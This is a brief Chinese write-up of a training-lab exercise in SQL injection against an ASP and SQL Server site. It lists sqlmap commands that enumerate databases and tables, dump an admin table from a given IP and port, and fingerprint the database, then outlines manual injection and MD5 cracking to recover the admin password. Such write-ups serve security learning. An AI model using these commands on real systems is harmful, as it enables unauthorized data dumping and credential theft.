SQL手工注入漏洞测试(Sql Server数据库)解题思路小记

靶环境:IIS+ASP+Sql Server,Aspx代码对客户端提交的参数未做任何过滤。
解题目标:
手工进行SQL注入测试,获取管理密码登录。
使用sqlmap获取数据库中的表名和字段名;如图:
通过:sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --dbs 获取数据库中的表名
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记_第1张图片
sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --tables -D “mozhe_db_v2” 查看mozhe_db_v2中表:
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记_第2张图片sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --dump -T “manage” -D “mozhe_db_v2” 查看manage表中数据字段
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记_第3张图片
sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --batch 通过该命令可以判断出该数据库为何种:
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记_第4张图片
从图可知该数据为sql server
通过手工注入,发现回显点:
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记_第5张图片查询用户和密码:
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记_第6张图片MD5解密密码即可获得正确密码

你可能感兴趣的:(web安全)